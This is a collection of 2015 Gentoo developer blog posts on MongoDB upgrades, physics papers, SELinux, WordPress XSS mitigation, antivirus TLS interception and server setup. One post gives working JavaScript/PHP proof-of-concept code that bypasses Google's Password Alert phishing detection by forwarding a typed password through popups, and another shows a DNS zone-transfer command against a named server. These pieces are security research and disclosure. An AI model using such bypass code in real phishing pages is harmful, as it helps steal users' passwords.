We’ve waited a long time to see the latest 3.0 release features happening. The new WiredTiger storage engine hit the fan at the right time for us since we had reached the limits of our main production cluster and were considering alternatives.

So as surprising it may seem, it’s the first of our mongoDB architecture we’re upgrading to v3.0 as it has become a real necessity.

This post is about sharing our first experience about an ongoing and carefully planned major upgrade of a production cluster and does not claim to be a definitive migration guide.

Upgrade plan and hardware

The upgrade process is well covered in the mongoDB documentation already but I will list the pre-migration base specs of every node of our cluster.

  • mongodb v2.6.8
  • RAID1 spinning HDD 15k rpm for the OS (Gentoo Linux)
  • RAID10 4x SSD for mongoDB files under LVM
  • 64 GB RAM

Our overall philosophy is to keep most of the configuration parameters to their default values to start with. We will start experimenting with them when we have sufficient metrics to compare with later.

Disk (re)partitioning considerations

The master-get-all-the-writes architecture is still one of the main limitation of mongoDB and this does not change with v3.0 so you obviously need to challenge your current disk layout to take advantage of the new WiredTiger engine.

mongoDB 2.6 MMAPv1

Considering our cluster data size, we were forced to use our 4 SSD in a RAID10 as it was the best compromise to preserve performance while providing sufficient data storage capacity.

We often reached the limits of our I/O and moved the journal out of the RAID10 to the mostly idle OS RAID1 with no significant improvements.

mongoDB 3.0 WiredTiger

The main consideration point for us is the new feature allowing to store the indexes in a separate directory. So we anticipated the data storage consumption reduction thanks to the snappy compression and decided to split our RAID10 in two dedicated RAID1.

Our test layout so far is :

  • RAID1 SSD for the data
  • RAID1 SSD for the indexes and journal

Our first node migration

After migrating our mongos and config servers to 3.0, we picked our worst performing secondary node to test the actual migration to WiredTiger. After all, we couldn’t do worse right ?

We are aware that the strong suit of WiredTiger is actually about having the writes directed to it and will surely share our experience of this aspect later.

compression is bliss

To make this comparison accurate, we resynchronized this node totally before migrating to WiredTiger so we could compare a non fragmented MMAPv1 disk usage with the WiredTiger compressed one.

While I can’t disclose the actual values, compression worked like a charm for us with a gain ratio of 3,2 on disk usage (data + indexes) which is way beyond our expectations !

This is the DB Storage graph from MMS, showing a gain ratio of 4 surely due to indexes being in a separate disk now.

2015-05-07-115324_461x184_scrot

 

 

 

 

memory usage

As with the disk usage, the node had been running hot on MMAPv1 before the actual migration so we can compare memory allocation/consumption of both engines.

There again the memory management of WiredTiger and its cache shows great improvement. For now, we left the default setting which has WiredTiger limit its cache to half the available memory of the system. We’ll experiment with this setting later on.

2015-05-07-115347_459x177_scrot

 

 

 

 

connections

This I’m still not sure of the actual cause yet but the connections count is higher and more steady than before on this node.

2015-05-07-123449_454x183_scrot

First impressions

The node is running smooth for several hours now. We are getting acquainted to the new metrics and statistics from WiredTiger. The overall node and I/O load is better than before !

While all the above graphs show huge improvements there is no major change from our applications point of view. We didn’t expect any since this is only one node in a whole cluster and that the main benefits will also come from master node migrations.

I’ll continue to share our experience and progress about our mongoDB 3.0 upgrade.

May 06, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

It's time to announce yet another nice result. Our manuscript "Transport across a carbon nanotube quantum dot contacted with ferromagnetic leads: experiment and non-perturbative modeling" has been accepted as a regular article by Physical Review B.
When ferromagnetic materials are used as contacts for a carbon nanotube at low temperature, the current is strongly influenced by the direction of the contact magnetization via the so-called tunneling magnetoresistance (TMR). Since the nanotube contains a quantum dot, in addition its electronic energy levels play an important role; the TMR depends on the gate voltage value and can reach large negative and positive values. Here, in another fruitful joint experimental and theoretical effort, we present both measurements of the gate-dependent TMR across a "shell" of four Coulomb oscillations, and model them in the so-called "dressed second order" framework. The calculations nicely reproduce the characteristic oscillatory patterns of the TMR gate dependence.

"Transport across a carbon nanotube quantum dot contacted with ferromagnetic leads: experiment and non-perturbative modeling"
A. Dirnaichner, M. Grifoni, A. Prüfling, D. Steininger, A. K. Hüttel, and Ch. Strunk
Phys. Rev. B 91, 195402 (2015); arXiv:1502.02005 (PDF)

May 04, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

We're happy to be able to announce that our manuscript "Broken SU(4) symmetry in a Kondo-correlated carbon nanotube" has been accepted for publication in Physical Review B.
This manuscript is the result of a joint experimental and theoretical effort. We demonstrate that there is a fundamental difference between cotunneling and the Kondo effect - a distinction that has been debated repeatedly in the past. In carbon nanotubes, the two graphene-derived Dirac points can lead to a two-fold valley degeneracy in addition to spin degeneracy; each orbital "shell" of a confined electronic system can be filled with four electrons. In most nanotubes, these degeneracies are broken by the spin-orbit interaction (due to the wall curvature) and by valley mixing (due to, as recently demonstrated, scattering at the nanotube boundaries). Using an externally applied magnetic field, the quantum states involved in equilibrium (i.e., elastic, zero-bias) and nonequilibrium (i.e., inelastic, finite bias) transitions can be identified. We show theoretically and experimentally that in the case of Kondo correlations, not all quantum state pairs contribute to Kondo-enhanced transport; some of these are forbidden by symmetries stemming from the carbon nanotube single particle Hamiltonian. This is distinctly different from the case of inelastic cotunneling (at higher temperatures and/or weaker quantum dot-lead coupling), where all transitions have been observed in the past.

"Broken SU(4) symmetry in a Kondo-correlated carbon nanotube"
D. R. Schmid, S. Smirnov, M. Marganska, A. Dirnaichner, P. L. Stiller, M. Grifoni, A. K. Hüttel, and Ch. Strunk
Phys. Rev. B 91, 155435 (2015) (PDF)

Nirbheek Chauhan a.k.a. nirbheek (homepage, bugs)
A Transcoding Proxy for HTTP Video Streams (May 04, 2015, 07:43 UTC)

Sometime last year, we worked on a client project to create a prototype for a server that is, in essence, a "transcoding proxy". It accepts N HTTP client streams and makes them available for an arbitrary number of clients via HTTP GET (and/or over RTP/UDP) in the form of WebM streams. Basically, it's something similar to Twitch.tv. The terms of our work with the client allowed us to make this work available as Free and Open Source Software, and this blog post is the announcement of its public availability.

Go and try it out!

git clone http://code.centricular.com/soup-transcoding-proxy/

The purpose of this release is to demonstrate some of the streaming/live transcoding capabilities of GStreamer and the capabilities of LibSoup as an HTTP server library. Some details about the server follow, but there's more documentation and examples on how to use the server in the git repository.

In addition to using GStreamer, the server uses the GNOME HTTP library LibSoup for implementing the HTTP server which accepts and makes available live HTTP streams. Stress-testing for up to 100 simultaneous clients has been done with the server, with a measured end-to-end stream latency of between 150ms to 250ms depending on the number of clients. This can be likely improved by using codecs with lower latency and so on—after all the project is just a prototype. :)

The N client streams sent to the proxy via HTTP PUT/PUSH are transcoded to VP8/Vorbis WebM if needed, but are simply remuxed and passed through if they are in the same format. Optionally, the proxy can also broadcast each client stream to a list of pre-specified hosts via RTP/UDP.

Clients that want to stream video from the server can connect or disconnect at any time, and will get the current stream whenever they (re)connect. The server also accepts HTTP streams via both Chunked-Encoding and fixed-length HTTP PUT requests.

There is also a JSON-based REST API to interact with the server. There is also in-built validation via a Token Server. A specified host (or address mask) can be whitelisted, which will allow it to add or remove session id tokens along with details about the types of streams that the specified session id is allowed to send to the server, and the types of streams that will be made available by the proxy. For more information, see the REST API documentation.

We hope you find this example instructive in how to use LibSoup to implement an HTTP server and in using GStreamer for streaming and encoding purposes. Looking forward to hearing from you about it!

May 02, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

Google Password AlertA few days ago Google released a Chrome extension that emits a warning if a user types in his Google account password on a foreign webpage. This is meant as a protection against phishing pages. Code is on Github and the extension can be installed through Google's Chrome Web Store.

When I heard this the first time I already thought that there are probably multiple ways to bypass that protection with some Javascript trickery. Seems I was right. Shortly after the extension was released security researcher Paul Moore published a way to bypass the protection by preventing the popup from being opened. This was fixed in version 1.4.

At that point I started looking into it myself. Password Alert tries to record every keystroke from the user and checks if that matches the password (it doesn't store the password, only a hash). My first thought was to simulate keystrokes via Javascript. I have to say that my Javascript knowledge is close to nonexistent, but I can use Google and read Stackoverflow threads, so I came up with this:

<script>
function simkey(e) {
if (e.which==0) return;
var ev=document.createEvent("KeyboardEvent");
ev.initKeyboardEvent("keypress", true, true, window, 0, 0, 0, 0, 0, 0);
document.getElementById("pw").dispatchEvent(ev);
}
</script>
<form action="" method="POST">
<input type="password" id="pw" name="pw" onkeypress="simkey(event);">
<input type="submit">
</form>


For every key a user presses this generates a Javascript KeyboardEvent. This is enough to confuse the extension. I reported this to the Google Security Team and Andrew Hintz. Literally minutes before I sent the mail a change was committed that did some sanity checks on the events and thus prevented my bypass from working (it checks the charcode and it seems there is no way in webkit to generate a KeyboardEvent with a valid charcode).

While I did that Paul Moore also created another bypass which relies on page reloads. A new version 1.6 was released fixing both my and Moores bypass.

I gave it another try and after a couple of failures I came up with a method that still works. The extension will only store keystrokes entered on one page. So what I did is that on every keystroke I create a popup (with the already typed password still in the form field) and close the current window. The closing doesn't always work, I'm not sure why that's the case, this can probably be improved somehow. There's also some flickering in the tab bar. The password is passed via URL, this could also happen otherwise (converting that from GET to POST variable is left as an exercise to the reader). I'm also using PHP here to insert the variable into the form, this could be done in pure Javascript. Here's the code, still working with the latest version:

<script>
function rlt() {
window.open("https://test.hboeck.de/pw2/?val="+document.getElementById("pw").value);
self.close();
}
</script>
<form action="." method="POST">
<input type="text" name="pw" id="pw" onkeyup="rlt();" onfocus="this.value=this.value;" value="<?php
if (isset($_GET['val'])) echo $_GET['val'];
?>">
<input type="submit">
<script>
document.getElementById("pw").focus();
</script>


Honestly I have a lot of doubts if this whole approach is a good idea. There are just too many ways how this can be bypassed. I know that passwords and phishing are a big problem, I just doubt this is the right approach to tackle it.

One more thing: When I first tested this extension I was confused, because it didn't seem to work. What I didn't know is that this purely relies on keystrokes. That means when you copy-and-paste your password (e. g. from some textfile in a crypto container) then the extension will provide you no protection. At least to me this was very unexpected behaviour.

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
New personal gamestation! (May 02, 2015, 00:33 UTC)

Beside a new devbox that I talked about setting up, now that I no longer pay for the tinderbox I also decided to buy myself a new PC for playing games (so Windows-bound, unfortunately), replacing Yamato that has been serving me well for years at this point.

Given we've talked about this at the office as well, I'll write down the specs over here, with the links to Amazon (where I bought the components), as I know a fair number of people are always interested to know specs. I will probably write down some reviews on Amazon itself as well as on the blog, for the components that can be discussed "standalone".

  • CPU: Intel i7 5930K (Amazon UK), hex-core Haswell-E; it was intended as a good compromise between high performance and price, not only for gaming but also for Adobe Lightroom.
  • Motherboard: Asus X99-S (Amazon UK)
  • Memory: Crucial Ballistix 32GB (8GBx4) (Amazon UK) actually this one I ordered from Crucial directly, because the one I originally ordered on Amazon UK was going to ship from Las Vegas, which meant I had to pay customs on it. I am still waiting for that one to be fully cancelled, but then Crucial was able to deliver an order placed on Wednesday at 10pm by Friday, which was pretty good (given that this is a long weekend in Ireland.)
  • Case: Fractal Design Define R5 (Amazon UK) upon suggestion of two colleagues, one who only saw it in reviews, the other actually having the previous version. It is eerily quiet and very well organized; it would also fit a huge amount of storage if I needed to build a new NAS rather than a desktop PC.
  • CPU cooler: NZXT Kraken X61 (Amazon UK) I went with water cooling for the CPU because I did not like the size of the copper fins in the other alternatives of suggested coolers for the chosen CPU. Since this is a completely sealed system it didn't feel too bad. The only shaky part is that the only proper space for this to fit into the case is on the top-front side, and it does require forcing the last insulation panel in a little bit.

Now you probably notices some parts missing; the reason is that I have bought a bunch of components to upgrade Yamato over the past year and a half since being employed also means being able to just scratch your itch for power more easily, especially if you, like me, are single and not planning a future as a stock player. Some of the updates are still pretty good and others are a bit below average now, and barely average when I bought it, but I think it might be worth listing them still.

  • SSD: Samsung 850 EVO (Amazon UK) and Crucial M550 (Amazon UK), both 1TB. The reason for having two different ones is because the latter (which was the first of the two) was not available when I decided to get a second one, and the reason to get a second one was because I realized that while keeping pictures on the SSD helped a lot, the rest of the OS was still too slow…
  • GPU: Asus GeForce GTX660 (Amazon UK) because I needed something good that didn't cost too much at the time.
  • PSU: be quiet! Dark Power Pro 1200W (Amazon UK) which I had to replace when I bought the graphics card, as the one I had before didn't have the right PCI-E power connectors, or rather it had one too few. Given that Yamato is a Dual-Quad Opteron, with registered ECC memory, I needed something that would at least take 1kW; I'm not sure how much it's consuming right now to be honest.

We'll see how it fares once I have it fully installed and started playing games on it, I guess.

May 01, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)
DNS AXFR scan data (May 01, 2015, 22:25 UTC)

I recently was made aware of an issue that many authoritative nameservers answer to AXFR requests. AXFR is a feature of the Domain Name System (DNS) that allows to query complete zones from a name server. That means one can find out all subdomains for a given domain.

If you want to see how this looks Verizon kindly provides you a DNS server that will answer with a very large zone to AXFR requests:
dig axfr verizonwireless.com @ns-scrm.verizonwireless.com

This by itself is not a security issue. It can however become a problem if people consider some of their subdomains / URLs secret. While checking this issue I found one example where such a subdomain contained a logging interface that exposed data that was certainly not meant to be public. However it is a bad idea in general to have "secret" subdomains, because there is no way to keep them really secret. DNS itself is not encrypted, therefore by sniffing your traffic it is always possible to see your "secret" subdomains.

AXFR is usually meant to be used between trusting name servers and requests by public IPs should not be answered. While it is in theory possible that someone considers publicly available AXFR a desired feature I assume in the vast majority these are just misconfigurations and were never intended to be public. I contacted a number of these and when they answered none of them claimed that this was an intended configuration. I'd generally say that it's wise to disable services you don't need. Recently US-CERT has issued an advisory about this issue.

I have made a scan of the Alexa top 1 million web pages and checked if their DNS server answers to AXFR requests. The University of Michigan has a project to collect data from Internet scans and I submitted my scan results to them. So you're welcome to download and analyze the data.

April 30, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)

If you are using SELinux on production systems (with which I mean systems that you offer services with towards customers or other parties beyond you, yourself and your ego), please consider proper change management if you don’t do already. SELinux is a very sensitive security subsystem – not in the sense that it easily fails, but because it is very fine-grained and as such can easily stop applications from running when their behavior changes just a tiny bit.

Sensitivity of SELinux

SELinux is a wonderful security measure for Linux systems that can prevent successful exploitation of vulnerabilities or misconfigurations. Of course, it is not the sole security measure that systems should take. Proper secure configuration of services, least privilege accounts, kernel-level mitigations such as grSecurity and more are other measures that certainly need to be taken if you really find system security to be a worthy goal to attain. But I’m not going to talk about those others right now. What I am going to focus on is SELinux, and how sensitive it is to changes.

An important functionality of SELinux to understand is that it segregates the security control system itself (the SELinux subsystem) from its configuration (the policy). The security control system itself is relatively small, and focuses on enforcement of the policy and logging (either because the policy asks to log something, or because something is prevented, or because an error occurred). The most difficult part of handling SELinux on a system is not enabling or interacting with it. No, it is its policy.

The policy is also what makes SELinux so darn sensitive for small system changes (or behavior that is not either normal, or at least not allowed through the existing policy). Let me explain with a small situation that I recently had.

Case in point: Switching an IP address

A case that beautifully shows how sensitive SELinux can be is an IP address change. My systems all obtain their IP address (at least for IPv4) from a DHCP system. This is of course acceptable behavior as otherwise my systems would never be able to boot up successfully anyway. The SELinux policy that I run also allows this without any hindrance. So that was not a problem.

Yet recently I had to switch an IP address for a system in production. All the services I run are set up in a dual-active mode, so I started with the change by draining the services to the second system, shutting down the service and then (after reconfiguring the DHCP system to now provide a different IP address) reload the network configuration. And then it happened – the DHCP client just stalled.

As the change failed, I updated the DHCP system again to deliver the old IP address and then reloaded the network configuration on the client. Again, it failed. Dumbstruck, I looked at the AVC denials and lo and behold, I notice a dig process running in a DHCP client related domain that is trying to do UDP binds, which the policy (at that time) did not allow. But why now suddenly, after all – this system was running happily for more than a year already (and with occasional reboots for kernel updates).

I won’t bore you with the investigation. It boils down to the fact that the DHCP client detected a change compared to previous startups, and was configured to run a few hooks as additional steps in the IP lease setup. As these hooks were never ran previously, the policy was never challenged to face this. And since the address change occurred a revert to the previous situation didn’t work either (as its previous state information was already deleted).

I was able to revert the client (which is a virtual guest in KVM) to the situation right before the change (thank you savevm and loadvm functionality) so that I could work on the policy first in a non-production environment so that the next change attempt was successful.

Change management

The previous situation might be “solved” by temporarily putting the DHCP client domain in permissive mode just for the change and then back. But that is ignoring the issue, and unless you have perfect operational documentation that you always read before making system or configuration changes, I doubt that you’ll remember this for the next time.

The case is also a good example on the sensitivity of SELinux. It is not just when software is being upgraded. Every change (be it in configuration, behavior or operational activity) might result in a situation that is new for the loaded SELinux policy. As the default action in SELinux is to deny everything, this will result in unexpected results on the system. Sometimes very visible (no IP address obtained), sometimes hidden behind some weird behavior (hostname correctly set but not the domainname) or perhaps not even noticed until far later. Compare it to the firewall rule configurations: you might be able to easily confirm that standard flows are still passed through, but how are you certain that fallback flows or one-in-a-month connection setups are not suddenly prevented from happening.

A somewhat better solution than just temporarily disabling SELinux access controls for a domain is to look into proper change management. Whenever a change has to be done, make sure that you

  • can easily revert the change back to the previous situation (backups!)
  • have tested the change on a non-vital (preproduction) system first

These two principles are pretty vital when you are serious about using SELinux in production. I’m not talking about a system that hardly has any fine-grained policies, like where most of the system’s services are running in “unconfined” domains (although that’s still better than not running with SELinux at all), but where you are truly trying to put a least privilege policy in place for all processes and services.

Being able to revert a change allows you to quickly get a service up and running again so that customers are not affected by the change (and potential issues) for long time. First fix the service, then fix the problem. If you are an engineer like me, you might rather focus on the problem (and a permanent, correct solution) first. But that’s wrong – always first make sure that the customers are not affected by it. Revert and put the service back up, and then investigate so that the next change attempt will not go wrong anymore.

Having a multi-master setup might give some more leeway into investigating issues (as the service itself is not disrupted) so in the case mentioned above I would probably have tried fixing the issue immediately anyway if it wasn’t policy-based. But most users do not have truly multi-master service setups.

Being able to test (and retest) changes in non-production also allows you to focus on automation (so that changes can be done faster and in a repeated, predictable and qualitative manner), regression testing as well as change accumulation testing.

You don’t have time for that?

Be honest with yourself. If you support services for others (be it in a paid-for manner or because you support an organization in your free time) you’ll quickly learn that service availability is one of the most qualitative aspects of what you do. No matter what mess is behind it, most users don’t see all that. All they see is the service itself (and its performance / features). If a change you wanted to make made a service unavailable for hours, users will notice. And if the change wasn’t communicated up front or it is the n-th time that this downtime occurs, they will start asking questions you rather not hear.

Using a non-production environment is not that much of an issue if the infrastructure you work with supports bare metal restores, or snapshot/cloning (in case of VMs). After doing those a couple of times, you’ll easily find that you can create a non-production environment from the production one. Or, you can go for a permanent non-production environment (although you’ll need to take care that this environment is at all times representative for the production systems).

And regarding qualitative changes, I really recommend to use a configuration management system. I recently switched from Puppet to Saltstack and have yet to use the latter to its fullest set (most of what I do is still scripted), but it is growing on me and I’m pretty convinced that I’ll have the majority of my change management scripts removed by the end of this year towards Saltstack-based configurations. And that’ll allow me to automate changes and thus provide a more qualitative service offering.

With SELinux, of course.

April 29, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Code Hygiene (April 29, 2015, 03:03 UTC)

Some convenient Makefile targets that make it very easy to keep code clean:

scan:
        scan-build clang foo.c -o foo

indent:
        indent -linux *.c
scan-build is llvm/clang's static analyzer and generates some decent warnings. Using clang to build (in addition to 'default' gcc in my case) helps diversity and sometimes catches different errors.

indent makes code pretty, the 'linux' default settings are not exactly what I want, but close enough that I don't care to finetune yet.

Every commit should be properly indented and not cause more warnings to appear!

April 27, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Moving closer to 2.4 stabilization (April 27, 2015, 17:18 UTC)

The SELinux userspace project has released version 2.4 in february this year, after release candidates have been tested for half a year. After its release, we at the Gentoo Hardened project have been working hard to integrate it within Gentoo. This effort has been made a bit more difficult due to the migration of the policy store from one location to another while at the same time switching to HLL- and CIL based builds.

Lately, 2.4 itself has been pretty stable, and we’re focusing on the proper migration from 2.3 to 2.4. The SELinux policy has been adjusted to allow the migrations to work, and a few final fixes are being tested so that we can safely transition our stable users from 2.3 to 2.4. Hopefully we’ll be able to stabilize the userspace this month or beginning of next month.

Sebastian Pipping a.k.a. sping (homepage, bugs)
Comment vulnerability in WordPress 4.2 (April 27, 2015, 13:21 UTC)

Hanno Böck tweeted about WordPress 4.2 Stored XSS rather recently. The short version is: if an attacker can comment on your blog, your blog is owned.

Since the latest release is affected and is the version I am using, I have been looking for a way to disable comments globally, at least until a fix has been released.
I’m surprised how difficult disabling comments globally is.

Option “Allow people to post comments on new articles” is filed under “Default article settings”, so it applies to new posts only. Let’s disable that.
There is a plug-in Disable comments, but since it claims to not alter the database (unless in persistent mode), I have a feeling that it may only remove commenting forms but leave commenting active to hand-made GET/POST requests, so that may not be safe.

So without studying WordPress code in depth my impression is that I have two options:

  • a) restrict comments to registered users, deactivate registration (hoping that all existing users are friendly and that disabled registration is waterproof in 4.2) and/or
  • b) disable comments for future posts in the settings (in case I post again before an update) and for every single post from the past.

On database level, the former can be seen here:

mysql> SELECT option_name, option_value FROM wp_options
           WHERE option_name LIKE '%regist%';
+----------------------+--------------+
| option_name          | option_value |
+----------------------+--------------+
| users_can_register   | 0            |
| comment_registration | 1            |
+----------------------+--------------+
2 rows in set (0.01 sec)

For the latter, this is how to disable comments on all previous posts:

mysql> UPDATE wp_posts SET comment_status = 'closed';
Query OK, .... rows affected (.... sec)
Rows matched: ....  Changed: ....  Warnings: 0

If you have comments to share, please use e-mail this time. Upgraded to 4.2.1 now.

April 26, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

Intercepted certificate by AvastLately a lot of attention has been payed to software like Superfish and Privdog that intercepts TLS connections to be able to manipulate HTTPS traffic. These programs had severe (technically different) vulnerabilities that allowed attacks on HTTPS connections.

What these tools do is a widespread method. They install a root certificate into the user's browser and then they perform a so-called Man in the Middle attack. They present the user a certificate generated on the fly and manage the connection to HTTPS servers themselves. Superfish and Privdog did this in an obviously wrong way, Superfish by using the same root certificate on all installations and Privdog by just accepting every invalid certificate from web pages. What about other software that also does MitM interception of HTTPS traffic?

Antivirus software intercepts your HTTPS traffic

Many Antivirus applications and other security products use similar techniques to intercept HTTPS traffic. I had a closer look at three of them: Avast, Kaspersky and ESET. Avast enables TLS interception by default. By default Kaspersky intercepts connections to certain web pages (e. g. banking), there is an option to enable interception by default. In ESET TLS interception is generally disabled by default and can be enabled with an option.

When a security product intercepts HTTPS traffic it is itself responsible to create a TLS connection and check the certificate of a web page. It has to do what otherwise a browser would do. There has been a lot of debate and progress in the way TLS is done in the past years. A number of vulnerabilities in TLS (upon them BEAST, CRIME, Lucky Thirteen, FREAK and others) allowed to learn much more how to do TLS in a secure way. Also, problems with certificate authorities that issued malicious certificates (Diginotar, Comodo, Türktrust and others) led to the development of mitigation technologies like HTTP Public Key Pinning (HPKP) and Certificate Transparency to strengthen the security of Certificate Authorities. Modern browsers protect users much better from various threats than browsers used several years ago.

You may think: "Of course security products like Antivirus applications are fully aware of these developments and do TLS and certificate validation in the best way possible. After all security is their business, so they have to get it right." Unfortunately that's only what's happening in some fantasy IT security world that only exists in the minds of people that listened to industry PR too much. The real world is a bit different: All Antivirus applications I checked lower the security of TLS connections in one way or another.

Disabling of HTTP Public Key Pinning

Each and every TLS intercepting application I tested breaks HTTP Public Key Pinning (HPKP). It is a technology that a lot of people in the IT security community are pretty excited about: It allows a web page to pin public keys of certificates in a browser. On subsequent visits the browser will only accept certificates with these keys. It is a very effective protection against malicious or hacked certificate authorities issuing rogue certificates.

Browsers made a compromise when introducing HPKP. They won't enable the feature for manually installed certificates. The reason for that is simple (although I don't like it): If they hadn't done that they would've broken all TLS interception software like these Antivirus applications. But the applications could do the HPKP checking themselves. They just don't do it.

KasperskyKaspersky vulnerable to FREAK and CRIME

Having a look at Kaspersky, I saw that it is vulnerable to the FREAK attack, a vulnerability in several TLS libraries that was found recently. Even worse: It seems this issue has been reported publicly in the Kaspersky Forums more than a month ago and it is not fixed yet. Please remember: Kaspersky enables the HTTPS interception by default for sites it considers as especially sensitive, for example banking web pages. Doing that with a known security issue is extremely irresponsible.

I also found a number of other issues. ESET doesn't support TLS 1.2 and therefore uses a less secure encryption algorithm. Avast and ESET don't support OCSP stapling. Kaspersky enables the insecure TLS compression feature that will make a user vulnerable to the CRIME attack. Both Avast and Kaspersky accept nonsensical parameters for Diffie Hellman key exchanges with a size of 8 bit. Avast is especially interesting because it bundles the Google Chrome browser. It installs a browser with advanced HTTPS features and lowers its security right away.

These TLS features are all things that current versions of Chrome and Firefox get right. If you use them in combination with one of these Antivirus applications you lower the security of HTTPS connections.

There's one more interesting thing: Both Kaspersky and Avast don't intercept traffic when Extended Validation (EV) certificates are used. Extended Validation certificates are the ones that show you a green bar in the address line of the browser with the company name. The reason why they do so is obvious: Using the interception certificate would remove the green bar which users might notice and find worrying. The message the Antivirus companies are sending seems clear: If you want to deliver malware from a web page you should buy an Extended Validation certificate.

Everyone gets HTTPS interception wrong - just don't do it

So what do we make out of this? A lot of software products intercept HTTPS traffic (antiviruses, adware, youth protection filters, ...), many of them promise more security and everyone gets it wrong.

I think these technologies are a misguided approach. The problem is not that they make mistakes in implementing these technologies, I think the idea is wrong from the start. Man in the Middle used to be a description of an attack technique. It seems strange that it turned into something people consider a legitimate security technology. Filtering should happen on the endpoint or not at all. Browsers do a lot these days to make your HTTPS connections more secure. Please don't mess with that.

I question the value of Antivirus software in a very general sense, I think it's an approach that has very fundamental problems in itself and often causes more harm than good. But at the very least they should try not to harm other working security mechanisms.

(You may also want to read this EFF blog post: Dear Software Vendors: Please Stop Trying to Intercept Your Customers’ Encrypted Traffic)

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
New devbox running (April 26, 2015, 16:31 UTC)

I announced it in February that Excelsior, which ran the Tinderbox, was no longer at Hurricane Electric. I have also said I'll start on working on a new generation Tinderbox, and to do that I need a new devbox, as the only three Gentoo systems I have at home are the laptops and my HTPC, not exactly hardware to run compilation all the freaking time.

So after thinking of options, I decided that it was much cheaper to just rent a single dedicated server, rather than a full cabinet, and after asking around for options I settled for Online.net, because of price and recommendation from friends. Unfortunately they do not support Gentoo as an operating system, which makes a few things a bit more complicated. They do provide you with a rescue system, based on Ubuntu, which is enough to do the install, but not everything is easy that way either.

Luckily, most of the configuration (but not all) was stored in Puppet — so I only had to rename the hosts there, changed the MAC addresses for the LAN and WAN interfaces (I use static naming of the interfaces as lan0 and wan0, which makes many other pieces of configuration much easier to deal with), changed the IP addresses, and so on. Unfortunately since I didn't start setting up that machine through Puppet, it also meant that it did not carry all the information to replicate the system, so it required some iteration and fixing of the configuration. This also means that the next move is going to be easier.

The biggest problem has been setting up correctly the MDRAID partitions, because of GRUB2: if you didn't know, grub2 has an automagic dependency on mdadm — if you don't install it it won't be able to install itself on a RAID device, even though it can detect it; the maintainer refused to add an USE flag for it, so you have to know about it.

Given what can and cannot be autodetected by the kernel, I had to fight a little more than usual and just gave up and rebuilt the two (/boot and / — yes laugh at me but when I installed Excelsior it was the only way to get GRUB2 not to throw up) arrays as metadata 0.90. But the problem was being able to tell what the boot up errors were, as I have no physical access to the device of course.

The Online.net server I rented is a Dell server, that comes with iDRAC for remote management (Dell's own name for IPMI, essentially), and Online.net allows you to set up connections to through your browser, which is pretty neat — they use a pool of temporary IP addresses and they only authorize your own IP address to connect to them. On the other hand, they do not change the default certificates, which means you end up with the same untrustable Dell certificate every time.

From the iDRAC console you can't do much, but you can start up the remove, JavaWS-based console, which reminded me of something. Unfortunately the JNLP file that you can download from iDRAC did not work on either Sun, Oracle or IcedTea JREs, segfaulting (no kidding) with an X.509 error log as last output — I seriously thought the problem was with the certificates until I decided to dig deeper and found this set of entries in the JNLP file:

 <resources os="Windows" arch="x86">
   <nativelib href="https://idracip/software/avctKVMIOWin32.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLWin32.jar" download="eager"/>
 </resources>
 <resources os="Windows" arch="amd64">
   <nativelib href="https://idracip/software/avctKVMIOWin64.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLWin64.jar" download="eager"/>
 </resources>
 <resources os="Windows" arch="x86_64">
   <nativelib href="https://idracip/software/avctKVMIOWin64.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLWin64.jar" download="eager"/>
 </resources>
  <resources os="Linux" arch="x86">
    <nativelib href="https://idracip/software/avctKVMIOLinux32.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLLinux32.jar" download="eager"/>
  </resources>
  <resources os="Linux" arch="i386">
    <nativelib href="https://idracip/software/avctKVMIOLinux32.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLLinux32.jar" download="eager"/>
  </resources>
  <resources os="Linux" arch="i586">
    <nativelib href="https://idracip/software/avctKVMIOLinux32.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLLinux32.jar" download="eager"/>
  </resources>
  <resources os="Linux" arch="i686">
    <nativelib href="https://idracip/software/avctKVMIOLinux32.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLLinux32.jar" download="eager"/>
  </resources>
  <resources os="Linux" arch="amd64">
    <nativelib href="https://idracip/software/avctKVMIOLinux64.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLLinux64.jar" download="eager"/>
  </resources>
  <resources os="Linux" arch="x86_64">
    <nativelib href="https://idracip/software/avctKVMIOLinux64.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLLinux64.jar" download="eager"/>
  </resources>
  <resources os="Mac OS X" arch="x86_64">
    <nativelib href="https://idracip/software/avctKVMIOMac64.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLMac64.jar" download="eager"/>
  </resources>

Turns out if you remove everything but the Linux/x86_64 option, it does fetch the right jar and execute the right code without segfaulting. Mysteries of Java Web Start I guess.

So after finally getting the system to boot, the next step is setting up networking — as I said I used Puppet to set up the addresses and everything, so I had working IPv4 at boot, but I had to fight a little longer to get IPv6 working. Indeed IPv6 configuration with servers, virtual and dedicated alike, is very much an unsolved problem. Not because there is no solution, but mostly because there are too many solutions — essentially every single hosting provider I ever used had a different way to set up IPv6 (including none at all in one case, so the only option was a tunnel) so it takes some fiddling around to set it up correctly.

To be honest, Online.net has a better set up than OVH or Hetzner, the latter being very flaky, and a more self-service one that Hurricane, which was very flexible, making it very easy to set up, but at the same time required me to just mail them if I wanted to make changes. They document for dibbler, as they rely on DHCPv6 with DUID for delegation — they give you a single /56 v6 net that you can then split up in subnets and delegate independently.

